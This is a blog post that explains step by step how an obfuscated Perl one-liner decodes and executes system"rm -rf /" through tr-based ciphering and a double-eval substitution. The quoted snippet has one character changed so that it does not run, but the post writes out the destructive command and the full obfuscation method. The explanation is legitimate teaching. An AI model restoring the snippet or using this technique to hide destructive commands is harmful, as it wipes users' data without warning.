A bit of perl trickery

I wanted to understand how this snippet worked, and now I do, but at what cost? I have stared too long into perl's abyss, and now it stares back.

Cows in a field in front of budding trees at dusk

A Professional Tester, through back channels and chicanery, made me aware of an ancient perl evil of the form:

perl -e '$??s:;s:s;;$?::s;;]]=>%-{<-|}<&|`{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'

Don't worry - I changed one character to avoid DISASTROUS CONSEQUENCES. If you ran the real version, you would be dealing with rm -rf / and your day would be ruined.

But, for real: how do you get rm -rf / out of that junk? Aside: the collective noun for "perl statement" is "a headache".

Perl is meant to be flexible. Like, too flexible

Let's start somewhere in the middle.

You might be familiar with replacements on text using regular expressions, perhaps something like $my_text =~ s/this/that/g, which will replace instances of this in a string with that.

Perl (and a few other languages) have some alternate syntaxes for these regex operations. In the case of our evil code, they look like this: s;this;that;g, replacing the slashes with semicolons. You might want to use that if you're dealing with HTML and a lot of the text you're working with has / throughout. You don't have to escape slashes if your delimiters are semicolons, which makes the regular expressions easier to parse, slightly.

So! Look at this code:


# ... is the same as:


# ... is the same as:

$_ =~ s//]]=>%-{<-|}<&|`{/;

$_ is kind of the default variable in perl. Many functions operate on that variable by convention. Oh, and that final semicolon there, that's just a semicolon. We're passing a few different statements to the interpreter, and those statements are delimited by semicolon, just like you'd find at the end of a line of code in a reasonable programming language.

Okay, so what this line does is evaluate $_, finding all instances of the empty string (i.e. the contents between the first two slashes in s//[stuff]/ ), and replacing it with various punctuation and symbols (i.e. the contents between the second two slashes).

On to the next statement!

perl: The Write-Only language

Much like s/this/that/g, the y operator is another regex-based doodad. In this case, it's a legacy syntax for the tr operation, which translates one set of characters to another.

So if you have a string I like bats and run it through tr/abt/odg/ you will get I like dogs, with the tr operation replacing all instances of a with o, b with d, and so on. How's that for a forced example!

To the code!

y; -/[-`{-};`-{/" -;;

# ... is the same as:
tr/ -\/[-`{-}/`-{\/" -/; # notice the escaped / characters!

# ... is the same as:
$_ =~ tr/ -\/[-`{-}/`-{\/" -/;

... which is still very nearly inscrutable!

The tr operator can take ranges of characters, so you can say something like tr/a-z/n-za-m/ to get a ROT13 encoder/decoder! That expression may look unbalanced, but a-z has 26 characters; n-z and a-m both have 13 characters for a total of 26.

But here we're not doing ranges of, say, alphanumeric characters. We're doing ranges of ASCII nonsense. The first range after the tr is the range between the space character and the forward slash, -/ ,which, if you remember your ASCII tables, are the decimal values 32-47, or the characters: SP ! " # $ % & ' ( ) * + , - . / (where SP is the space character).

Going through all the ranges:

y; -/:-@[-`{-};`-{/" -;;
# ^ ^
# space to slash:  !"#$%&'()*+,-./

y; -/:-@[-`{-};`-{/" -;;
#    ^ ^
# colon to @: :;<=>?@

y; -/:-@[-`{-};`-{/" -;;
#       ^ ^
# [ to `: []^_`

y; -/:-@[-`{-};`-{/" -;;
#          ^ ^
# { to }: {|}

y; -/:-@[-`{-};`-{/" -;;
#              ^ ^
# backtick to {: `abcdefghijklmnopqrstuvwxyz{

y; -/:-@[-`{-};`-{/" -;;
#                 ^  ^
# these characters are not a range, just literals

Finally we can see how the substitution works:

# this puts the encoded message into $_
$_ =~ s//]]=>%-{<-|}<&|`{/

# this is the translation that decodes the message:
$_ =~ tr/ -\/[-`{-}/`-{\/" -/;

# which, if you de-obfuscate the ranges, you get the key:
# `abcdefghijklmnopqrstuvwxyz{/" -
#  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}

Looking at the encoded message, which starts with ]]=>%- , we can start to decode by finding the encoded character in the second row of the key, then looking at the corresponding character above it for its decoded value:

  • ] translates to y
  • ] translates to y
  • = translates to s
  • > translates to t
  • % translates to e
  • - translates to m

So the full translation is yystem"rm -rf /". Which would be dangerous, had I not changed the first character.

But how does execution work?

In perl, the system function executes its arguments as shell commands outside of the perl context. In this case, it runs rm -rf / as though from a command prompt. Which is bad.

But how does it actually do it?

Once again, we look at the s operator in the final few characters of the codelet: s;;$_;see. We already know this code is substituting the empty string with the value of $_, which is system"rm -rf /", but what of that see on the end?

The s modifier tells perl to treat everything as a single line of text, which I think in this case was only added to further confuse. The e operator evaluates the right side of the substitution, and doubling it to ee then evaluates the output of that evaluation: the first e looks at $_ and evaluates it to system"rm -rf /", and the second e executes system"rm -rf /".

Et voilĂ .

But what about the first stuff?

Right! There's still the $??s:;s:s;;$?:: nonsense.

Spreading that out, it's a ternary statement:

$??s:;s:s;;$?::# the rest

# ... is the same as:
$? ? s:;s:s;;$?: : # the rest

# ... is the same as:
if ($? != 0)
  s:;s:s;;$?: # or, per earlier, s/;s/s;;$?/
  # the rest

... All that to say, you can omit that part and it doesn't change the behavior of the snippet.

Gosh, what an adventure

I have no conclusion for this one. I wanted to understand how this snippet worked, and now I do, but at what cost? I have stared too long into perl's abyss, and now I worry that it stares back.

perl -e '$??s:;s:s;;$?::s;;:<).>{-)+%|)=|![%=/-%{;; y; -/:-@[-`{-};`-{/" -;;s;;$_;see'